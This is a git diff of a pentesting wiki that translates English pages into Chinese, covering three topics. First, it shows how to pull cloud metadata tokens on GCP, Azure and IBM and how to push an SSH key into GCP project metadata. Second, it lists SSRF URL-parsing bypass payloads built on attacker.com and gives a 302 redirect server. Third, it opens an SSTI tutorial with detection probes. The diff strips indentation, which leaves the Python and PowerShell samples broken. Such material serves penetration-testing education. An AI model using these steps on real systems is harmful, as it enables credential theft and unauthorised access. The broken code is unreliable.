 http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
 ```
-
-Check the scope of the token (with the previous output or running the following)
-
+检查令牌的范围（使用之前的输出或运行以下命令）
 ```bash
 curl https://www.googleapis.com/oauth2/v1/tokeninfo?access_token=ya29.XXXXXKuXXXXXXXkGT0rJSA  {
-        "issued_to": "101302079XXXXX",
-        "audience": "10130207XXXXX",
-        "scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
-        "expires_in": 2443,
-        "access_type": "offline"
+"issued_to": "101302079XXXXX",
+"audience": "10130207XXXXX",
+"scope": "https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring",
+"expires_in": 2443,
+"access_type": "offline"
 }
 ```
-
-Now push the SSH key.
-
+现在推送 SSH 密钥。
 ```bash
 curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata"
 -H "Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA"
 -H "Content-Type: application/json"
 --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}'
 ```
-
 ### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a>
 
-The metadata endpoint works the same as in VMs but without some endpoints:
-
+元数据端点的工作方式与虚拟机相同，但没有某些端点：
 ```bash
 # /project
 # Project name and number
@@ -308,23 +287,21 @@ curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/insta
 curl -s -H "Metadata-Flavor:Google" http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration
 # Service Accounts
 for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
-    echo "  Name: $sa"
-    echo "  Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
-    echo "  Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
-    echo "  Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
-    echo "  Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
-    echo "  Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
-    echo "  ==============  "
+echo "  Name: $sa"
+echo "  Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
+echo "  Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
+echo "  Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
+echo "  Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
+echo "  Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
+echo "  ==============  "
 done
 ```
-
 ## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a>
 
 > [!WARNING]
-> There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials
+> 这里没有像 AWS Roles 或 GCP 服务账户这样的东西，所以不要指望找到元数据机器人凭据
 
 Documentation available at [`https://developers.digitalocean.com/documentation/metadata/`](https://developers.digitalocean.com/documentation/metadata/)
-
 ```
 curl http://169.254.169.254/metadata/v1/id
 http://169.254.169.254/metadata/v1.json
@@ -336,26 +313,25 @@ http://169.254.169.254/metadata/v1/region
 http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one request:
 curl http://169.254.169.254/metadata/v1.json | jq
 ```
-
 ## Azure <a href="#cea8" id="cea8"></a>
 
 ### Azure VM
 
-[**Docs** in here](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux).
+[**文档** 在这里](https://learn.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service?tabs=linux)。
 
-- **Must** contain the header `Metadata: true`
-- Must **not** contain an `X-Forwarded-For` header
+- **必须**包含头部 `Metadata: true`
+- **不能**包含 `X-Forwarded-For` 头部
 
 > [!TIP]
-> An Azure VM can have attached 1 system managed identity and several user managed identities. Which basically means that you can **impersonate all the managed identities attached to a VM**.
+> Azure VM 可以附加 1 个系统管理身份和多个用户管理身份。这基本上意味着你可以 **模拟所有附加到 VM 的管理身份**。
 >
-> By **default**, the metadata endpoint will use the **system assigned MI (if any)**.
+> 默认情况下，元数据端点将使用 **系统分配的 MI（如果有）**。
 >
-> Unfortunately I couldn't find any metadata endpoint indicating all the MIs a VM has attached.
+> 不幸的是，我找不到任何元数据端点来指示 VM 附加的所有 MI。
 >
-> Therefore, to find all the attached MIs you can do:
+> 因此，要找到所有附加的 MI，你可以：
 >
-> - Get **attached identities with az cli** (if you have already compromised a principal in the Azure tenant)
+> - 使用 az cli 获取 **附加身份**（如果你已经在 Azure 租户中攻陷了一个主体）
 >
 > ```bash
 > az vm identity show \
@@ -363,17 +339,17 @@ curl http://169.254.169.254/metadata/v1.json | jq
 >   --name <vm-name>
 > ```
 >
-> - Get **attached identities** using the default attached MI in the metadata:
+> - 使用元数据中的默认附加 MI 获取 **附加身份**：
 >
 > ```bash
 > export API_VERSION="2021-12-13"
 >
-> # Get token from default MI
+> # 从默认 MI 获取令牌
 > export TOKEN=$(curl -s -H "Metadata:true" \
 >   "http://169.254.169.254/metadata/identity/oauth2/token?api-version=$API_VERSION&resource=https://management.azure.com/" \
 >   | jq -r '.access_token')
 >
-> # Get needed details
+> # 获取所需的详细信息
 > export SUBSCRIPTION_ID=$(curl -s -H "Metadata:true" \
 >   "http://169.254.169.254/metadata/instance?api-version=$API_VERSION" | jq -r '.compute.subscriptionId')
 > export RESOURCE_GROUP=$(curl -s -H "Metadata:true" \
@@ -381,23 +357,22 @@ curl http://169.254.169.254/metadata/v1.json | jq
 > export VM_NAME=$(curl -s -H "Metadata:true" \
 >   "http://169.254.169.254/metadata/instance?api-version=$API_VERSION" | jq -r '.compute.name')
 >
-> # Try to get attached MIs
+> # 尝试获取附加的 MIs
 > curl -s -H "Authorization: Bearer $TOKEN" \
 >   "https://management.azure.com/subscriptions/$SUBSCRIPTION_ID/resourceGroups/$RESOURCE_GROUP/providers/Microsoft.Compute/virtualMachines/$VM_NAME?api-version=$API_VERSION" | jq
 > ```
 >
-> - **Get all** the defined managed identities in the tenant and **brute force** to see if any of them is attached to the VM:
+> - **获取所有**在租户中定义的管理身份并 **暴力破解** 以查看是否有任何身份附加到 VM：
 >
 > ```bash
 > az identity list
 > ```
 
 > [!CAUTION]
-> In the token requests use any of the parameters `object_id`, `client_id` or `msi_res_id` to indicate the managed identity you want to use ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)). If none, the **default MI will be used**.
+> 在令牌请求中使用任何参数 `object_id`、`client_id` 或 `msi_res_id` 来指示你想要使用的管理身份（[**文档**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)）。如果没有，将使用 **默认 MI**。
 
 {{#tabs}}
 {{#tab name="Bash"}}
-
 ```bash
 HEADER="Metadata:true"
 URL="http://169.254.169.254/metadata"
@@ -421,11 +396,9 @@ curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&res
 echo "Storage token"
 curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&resource=https://storage.azure.com/"
 ```
-
 {{#endtab}}
 
 {{#tab name="PS"}}
-
 ```bash
 # Powershell
 Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
@@ -438,15 +411,14 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
 /metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
 /metadata/instance/compute/userData?api-version=2021-01-01&format=text
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
-### Azure App & Functions Services
+### Azure 应用程序和函数服务
 
-From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server.
+从 **env** 中可以获取 **`IDENTITY_HEADER`** 和 **`IDENTITY_ENDPOINT`** 的值。您可以使用这些值来获取与元数据服务器通信的令牌。
 
-Most of the time, you want a token for one of these resources:
+大多数情况下，您需要为以下资源之一获取令牌：
 
 - [https://storage.azure.com](https://storage.azure.com/)
 - [https://vault.azure.net](https://vault.azure.net/)
@@ -454,11 +426,10 @@ Most of the time, you want a token for one of these resources:
 - [https://management.azure.com](https://management.azure.com/)
 
 > [!CAUTION]
-> In the token requests use any of the parameters `object_id`, `client_id` or `msi_res_id` to indicate the managed identity you want to use ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)). If none, the **default MI will be used**.
+> 在令牌请求中使用 `object_id`、`client_id` 或 `msi_res_id` 中的任何参数来指示您想要使用的托管身份（[**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)）。如果没有，**将使用默认 MI**。
 
 {{#tabs}}
 {{#tab name="Bash"}}
-
 ```bash
 # Check for those env vars to know if you are in an Azure app
 echo $IDENTITY_HEADER
@@ -476,30 +447,28 @@ curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2019-08-0
 # Get storage token
 curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
 ```
-
 {{#endtab}}
 
 {{#tab name="PS"}}
-
 ```powershell
 # Define the API version
 $API_VERSION = "2019-08-01"
 
 # Function to get a token for a specified resource
 function Get-Token {
-    param (
-        [string]$Resource
-    )
-    $url = "$IDENTITY_ENDPOINT?resource=$Resource&api-version=$API_VERSION"
-    $headers = @{
-        "X-IDENTITY-HEADER" = $IDENTITY_HEADER
-    }
-    try {
-        $response = Invoke-RestMethod -Uri $url -Headers $headers -Method Get
-        $response.access_token
-    } catch {
-        Write-Error "Error obtaining token for $Resource: $_"
-    }
+param (
+[string]$Resource
+)
+$url = "$IDENTITY_ENDPOINT?resource=$Resource&api-version=$API_VERSION"
+$headers = @{
+"X-IDENTITY-HEADER" = $IDENTITY_HEADER
+}
+try {
+$response = Invoke-RestMethod -Uri $url -Headers $headers -Method Get
+$response.access_token
+} catch {
+Write-Error "Error obtaining token for $Resource: $_"
+}
 }
 
 # Get Management Token
@@ -529,11 +498,11 @@ Write-Host "Storage Token: $storageToken"
 $Token = 'eyJ0eX..'
 $URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
 $RequestParams = @{
- Method = 'GET'
- Uri = $URI
- Headers = @{
-  'Authorization' = "Bearer $Token"
- }
+Method = 'GET'
+Uri = $URI
+Headers = @{
+'Authorization' = "Bearer $Token"
+}
 }
 (Invoke-RestMethod @RequestParams).value
 
@@ -541,11 +510,11 @@ $RequestParams = @{
 $Token = 'eyJ0eX..'
 $URI = 'https://graph.microsoft.com/v1.0/applications'
 $RequestParams = @{
- Method = 'GET'
- Uri = $URI
- Headers = @{
- 'Authorization' = "Bearer $Token"
- }
+Method = 'GET'
+Uri = $URI
+Headers = @{
+'Authorization' = "Bearer $Token"
+}
 }
 (Invoke-RestMethod @RequestParams).value
 
@@ -561,26 +530,24 @@ Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
 At line:1 char:1
 + Get-AzResource
 + ~~~~~~~~~~~~~~
- + CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
- + FullyQualifiedErrorId :
++ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
++ FullyQualifiedErrorId :
 Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
 ```
-
 {{#endtab}}
 {{#endtabs}}
 
 ## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
 
 > [!WARNING]
-> Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM
-
+> 请注意，在 IBM 中，默认情况下元数据未启用，因此即使您在 IBM 云 VM 内部，也可能无法访问它。
 ```bash
 export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
-  -H "Metadata-Flavor: ibm"\
-  -H "Accept: application/json"\
-  -d '{
-        "expires_in": 3600
-      }' | jq -r '(.access_token)'`
+-H "Metadata-Flavor: ibm"\
+-H "Accept: application/json"\
+-d '{
+"expires_in": 3600
+}' | jq -r '(.access_token)'`
 
 # Get instance details
 curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
@@ -597,28 +564,27 @@ curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance
 # Get IAM credentials
 curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
 ```
-
-Documentation for various platforms' metadata services is outlined below, highlighting the methods through which configuration and runtime information for instances can be accessed. Each platform offers unique endpoints to access its metadata services.
+以下是各种平台元数据服务的文档，突出显示了可以访问实例的配置和运行时信息的方法。每个平台提供独特的端点来访问其元数据服务。
 
 ## Packetcloud
 
-For accessing Packetcloud's metadata, the documentation can be found at: [https://metadata.packet.net/userdata](https://metadata.packet.net/userdata)
+要访问 Packetcloud 的元数据，可以在以下位置找到文档：[https://metadata.packet.net/userdata](https://metadata.packet.net/userdata)
 
 ## OpenStack/RackSpace
 
-The necessity for a header is not mentioned. Metadata can be accessed through:
+未提及需要头部。可以通过以下方式访问元数据：
 
 - `http://169.254.169.254/openstack`
 
 ## HP Helion
 
-The necessity for a header is not mentioned here either. Metadata is accessible at:
+这里也未提及需要头部。元数据可以在以下位置访问：
 
 - `http://169.254.169.254/2009-04-04/meta-data/`
 
 ## Oracle Cloud
 
-Oracle Cloud provides a series of endpoints for accessing various metadata aspects:
+Oracle Cloud 提供了一系列端点以访问各种元数据方面：
 
 - `http://192.0.0.192/latest/`
 - `http://192.0.0.192/latest/user-data/`
@@ -627,7 +593,7 @@ Oracle Cloud provides a series of endpoints for accessing various metadata aspec
 
 ## Alibaba
 
-Alibaba offers endpoints for accessing metadata, including instance and image IDs:
+Alibaba 提供了访问元数据的端点，包括实例和镜像 ID：
 
 - `http://100.100.100.200/latest/meta-data/`
 - `http://100.100.100.200/latest/meta-data/instance-id`
@@ -635,26 +601,25 @@ Alibaba offers endpoints for accessing metadata, including instance and image ID
 
 ## Kubernetes ETCD
 
-Kubernetes ETCD can hold API keys, internal IP addresses, and ports. Access is demonstrated through:
+Kubernetes ETCD 可以保存 API 密钥、内部 IP 地址和端口。访问示例如下：
 
 - `curl -L http://127.0.0.1:2379/version`
 - `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
 
 ## Docker
 
-Docker metadata can be accessed locally, with examples given for container and image information retrieval:
+Docker 元数据可以在本地访问，提供了容器和镜像信息检索的示例：
 
-- Simple example to access containers and images metadata via the Docker socket:
-  - `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
-  - Inside the container, use curl with the Docker socket:
-    - `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
-    - `curl --unix-socket /var/run/docker.sock http://foo/images/json`
+- 通过 Docker 套接字访问容器和镜像元数据的简单示例：
+- `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
+- 在容器内，使用 curl 和 Docker 套接字：
+- `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
+- `curl --unix-socket /var/run/docker.sock http://foo/images/json`
 
 ## Rancher
 
-Rancher's metadata can be accessed using:
+Rancher 的元数据可以通过以下方式访问：
 
 - `curl http://rancher-metadata/<version>/<path>`
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
index cf8100b6c..495ce3403 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
@@ -1,8 +1,7 @@
-# SSRF Vulnerable Platforms
+# SSRF 漏洞平台
 
 {{#include ../../banners/hacktricks-training.md}}
 
-Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
+查看 **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
index 5a10ea866..a22d8920b 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/url-format-bypass.md
@@ -1,9 +1,8 @@
-# URL Format Bypass
+# URL格式绕过
 
 {{#include ../../banners/hacktricks-training.md}}
 
-### Localhost
-
+### 本地主机
 ```bash
 # Localhost
 http://127.0.0.1:80
@@ -76,13 +75,11 @@ http://bugbounty.dod.network = 127.0.0.2 (localhost)
 1ynrnhl.xip.io == 169.254.169.254
 spoofed.burpcollaborator.net = 127.0.0.1
 ```
-
 ![](<../../images/image (776).png>)
 
-The **Burp extension** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) implements IP formatting bypasses.
-
-### Domain Parser
+**Burp 扩展** [**Burp-Encode-IP**](https://github.com/e1abrador/Burp-Encode-IP) 实现了 IP 格式化绕过。
 
+### 域解析器
 ```bash
 https:attacker.com
 https:/attacker.com
@@ -111,9 +108,7 @@ attacker。com
 Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ
 ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
-
-### Domain Confusion
-
+### 域名混淆
 ```bash
 # Try also to change attacker.com for 127.0.0.1 to try to access localhost
 # Try replacing https by http
@@ -148,33 +143,29 @@ http://1.1.1.1 &@2.2.2.2# @3.3.3.3/
 #Parameter pollution
 next={domain}&next=attacker.com
 ```
+### 路径和扩展绕过
 
-### Paths and Extensions Bypass
-
-If you are required that the URL must end in a path or an extension, or must contain a path you can try one of the following bypasses:
-
+如果您需要 URL 以路径或扩展名结尾，或必须包含路径，您可以尝试以下绕过方法：
 ```
 https://metadata/vulerable/path#/expected/path
 https://metadata/vulerable/path#.extension
 https://metadata/expected/path/..%2f..%2f/vulnerable/path
 ```
-
 ### Fuzzing
 
-The tool [**recollapse**](https://github.com/0xacb/recollapse) can generate variations from a given input to try to bypass the used regex. Check [**this post**](https://0xacb.com/2022/11/21/recollapse/) also for more information.
+工具 [**recollapse**](https://github.com/0xacb/recollapse) 可以从给定输入生成变体，以尝试绕过使用的正则表达式。有关更多信息，请查看 [**这篇文章**](https://0xacb.com/2022/11/21/recollapse/)。
 
 ### Automatic Custom Wordlists
 
-Check out the [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet) from portswigger were you can introduce the allowed host and the attackers one and it'll generate a list of URLs to try for you. It also considers if you can use the URL in a parameter, in a Host header or in a CORS header.
+查看 portswigger 的 [**URL validation bypass cheat sheet** webapp](https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet)，您可以在其中输入允许的主机和攻击者的主机，它将为您生成要尝试的 URL 列表。它还考虑您是否可以在参数、Host 头或 CORS 头中使用 URL。
 
 {% embed url="https://portswigger.net/web-security/ssrf/url-validation-bypass-cheat-sheet" %}
 
 ### Bypass via redirect
 
-It might be possible that the server is **filtering the original request** of a SSRF **but not** a possible **redirect** response to that request.\
-For example, a server vulnerable to SSRF via: `url=https://www.google.com/` might be **filtering the url param**. But if you uses a [python server to respond with a 302](https://pastebin.com/raw/ywAUhFrv) to the place where you want to redirect, you might be able to **access filtered IP addresses** like 127.0.0.1 or even filtered **protocols** like gopher.\
-[Check out this report.](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
-
+服务器可能在 **过滤 SSRF 的原始请求**，**但不**过滤对该请求的可能 **重定向** 响应。\
+例如，一个通过 `url=https://www.google.com/` 漏洞的 SSRF 服务器可能在 **过滤 url 参数**。但是，如果您使用 [python 服务器以 302 响应](https://pastebin.com/raw/ywAUhFrv) 到您想要重定向的地方，您可能能够 **访问被过滤的 IP 地址**，如 127.0.0.1，甚至被过滤的 **协议**，如 gopher。\
+[查看此报告。](https://sirleeroyjenkins.medium.com/just-gopher-it-escalating-a-blind-ssrf-to-rce-for-15k-f5329a974530)
 ```python
 #!/usr/bin/env python3
 
@@ -184,41 +175,39 @@ import sys
 from http.server import HTTPServer, BaseHTTPRequestHandler
 
 if len(sys.argv)-1 != 2:
-    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
-    sys.exit()
+print("Usage: {} <port_number> <url>".format(sys.argv[0]))
+sys.exit()
 
 class Redirect(BaseHTTPRequestHandler):
-   def do_GET(self):
-       self.send_response(302)
-       self.send_header('Location', sys.argv[2])
-       self.end_headers()
+def do_GET(self):
+self.send_response(302)
+self.send_header('Location', sys.argv[2])
+self.end_headers()
 
 HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
 ```
+## 解释的技巧
 
-## Explained Tricks
+### 反斜杠技巧
 
-### Blackslash-trick
-
-The _backslash-trick_ exploits a difference between the [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) and [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B). While RFC3986 is a general framework for URIs, WHATWG is specific to web URLs and is adopted by modern browsers. The key distinction lies in the WHATWG standard's recognition of the backslash (`\`) as equivalent to the forward slash (`/`), impacting how URLs are parsed, specifically marking the transition from the hostname to the path in a URL.
+_反斜杠技巧_ 利用 [WHATWG URL Standard](https://url.spec.whatwg.org/#url-parsing) 和 [RFC3986](https://datatracker.ietf.org/doc/html/rfc3986#appendix-B) 之间的差异。虽然 RFC3986 是 URI 的一般框架，但 WHATWG 特定于网络 URL，并被现代浏览器采用。关键区别在于 WHATWG 标准将反斜杠 (`\`) 视为与正斜杠 (`/`) 等价，这影响了 URL 的解析，特别是标记从主机名到 URL 路径的过渡。
 
 ![https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg](https://bugs.xdavidhu.me/assets/posts/2021-12-30-fixing-the-unfixable-story-of-a-google-cloud-ssrf/spec_difference.jpg)
 
-### Left square bracket
+### 左方括号
 
-The “left square bracket” character `[` in the userinfo segment can cause Spring’s UriComponentsBuilder to return a hostname value that differs from browsers: [https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)
+用户信息段中的“左方括号”字符 `[` 可能导致 Spring 的 UriComponentsBuilder 返回与浏览器不同的主机名值：[https://example.com\[@attacker.com](https://portswigger.net/url-cheat-sheet#id=1da2f627d702248b9e61cc23912d2c729e52f878)
 
-### Other Confusions
+### 其他混淆
 
 ![https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](<../../images/image (600).png>)
 
-image from [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
+来自 [https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/](https://claroty.com/2022/01/10/blog-research-exploiting-url-parsing-confusion/)
 
-## References
+## 参考文献
 
 - [https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25](https://as745591.medium.com/albussec-penetration-list-08-server-side-request-forgery-ssrf-sample-90267f095d25)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Request%20Forgery/README.md)
 - [https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet](https://portswigger.net/research/new-crazy-payloads-in-the-url-validation-bypass-cheat-sheet)
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/ssti-server-side-template-injection/README.md b/src/pentesting-web/ssti-server-side-template-injection/README.md
index 416d41580..cb05361a7 100644
--- a/src/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/src/pentesting-web/ssti-server-side-template-injection/README.md
@@ -4,95 +4,84 @@
 
 <figure><img src="../../images/image (641).png" alt=""><figcaption></figcaption></figure>
 
-[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
+[**RootedCON**](https://www.rootedcon.com) 是 **西班牙** 最相关的网络安全事件，也是 **欧洲** 最重要的事件之一。这个大会的 **使命是促进技术知识**，是各个学科的技术和网络安全专业人士的一个热烈交流点。
 
 {% embed url="https://www.rootedcon.com/" %}
 
-## What is SSTI (Server-Side Template Injection)
+## 什么是 SSTI (Server-Side Template Injection)
 
-Server-side template injection is a vulnerability that occurs when an attacker can inject malicious code into a template that is executed on the server. This vulnerability can be found in various technologies, including Jinja.
-
-Jinja is a popular template engine used in web applications. Let's consider an example that demonstrates a vulnerable code snippet using Jinja:
+服务器端模板注入是一种漏洞，当攻击者能够将恶意代码注入到在服务器上执行的模板时，就会发生这种漏洞。此漏洞可以在多种技术中找到，包括 Jinja。
 
+Jinja 是一个在 web 应用程序中使用的流行模板引擎。让我们考虑一个使用 Jinja 的脆弱代码片段的示例：
 ```python
 output = template.render(name=request.args.get('name'))
 ```
+在这段脆弱的代码中，用户请求中的 `name` 参数直接通过 `render` 函数传递到模板中。这可能允许攻击者将恶意代码注入到 `name` 参数中，从而导致服务器端模板注入。
 
-In this vulnerable code, the `name` parameter from the user's request is directly passed into the template using the `render` function. This can potentially allow an attacker to inject malicious code into the `name` parameter, leading to server-side template injection.
-
-For instance, an attacker could craft a request with a payload like this:
-
+例如，攻击者可以构造一个包含如下有效负载的请求：
 ```
 http://vulnerable-website.com/?name={{bad-stuff-here}}
 ```
+有效载荷 `{{bad-stuff-here}}` 被注入到 `name` 参数中。该有效载荷可以包含 Jinja 模板指令，使攻击者能够执行未经授权的代码或操纵模板引擎，从而可能控制服务器。
 
-The payload `{{bad-stuff-here}}` is injected into the `name` parameter. This payload can contain Jinja template directives that enable the attacker to execute unauthorized code or manipulate the template engine, potentially gaining control over the server.
+为了防止服务器端模板注入漏洞，开发人员应确保在将用户输入插入模板之前，正确地对其进行清理和验证。实施输入验证和使用上下文感知的转义技术可以帮助减轻此漏洞的风险。
 
-To prevent server-side template injection vulnerabilities, developers should ensure that user input is properly sanitized and validated before being inserted into templates. Implementing input validation and using context-aware escaping techniques can help mitigate the risk of this vulnerability.
+### 检测
 
-### Detection
+要检测服务器端模板注入 (SSTI)，最初，**模糊测试模板** 是一种简单的方法。这涉及将一系列特殊字符 (**`${{<%[%'"}}%\`**) 注入模板，并分析服务器对常规数据与此特殊有效载荷的响应差异。漏洞指示包括：
 
-To detect Server-Side Template Injection (SSTI), initially, **fuzzing the template** is a straightforward approach. This involves injecting a sequence of special characters (**`${{<%[%'"}}%\`**) into the template and analyzing the differences in the server's response to regular data versus this special payload. Vulnerability indicators include:
+- 抛出的错误，揭示漏洞并可能暴露模板引擎。
+- 反射中缺少有效载荷，或部分缺失，暗示服务器以不同于常规数据的方式处理它。
+- **明文上下文**：通过检查服务器是否评估模板表达式（例如 `{{7*7}}`，`${7*7}`）来区分 XSS。
+- **代码上下文**：通过更改输入参数确认漏洞。例如，改变 `http://vulnerable-website.com/?greeting=data.username` 中的 `greeting`，以查看服务器的输出是动态的还是固定的，例如 `greeting=data.username}}hello` 返回用户名。
 
-- Thrown errors, revealing the vulnerability and potentially the template engine.
-- Absence of the payload in the reflection, or parts of it missing, implying the server processes it differently than regular data.
-- **Plaintext Context**: Distinguish from XSS by checking if the server evaluates template expressions (e.g., `{{7*7}}`, `${7*7}`).
-- **Code Context**: Confirm vulnerability by altering input parameters. For instance, changing `greeting` in `http://vulnerable-website.com/?greeting=data.username` to see if the server's output is dynamic or fixed, like in `greeting=data.username}}hello` returning the username.
+#### 识别阶段
 
-#### Identification Phase
+识别模板引擎涉及分析错误消息或手动测试各种特定语言的有效载荷。常见的导致错误的有效载荷包括 `${7/0}`，`{{7/0}}` 和 `<%= 7/0 %>`。观察服务器对数学运算的响应有助于确定特定的模板引擎。
 
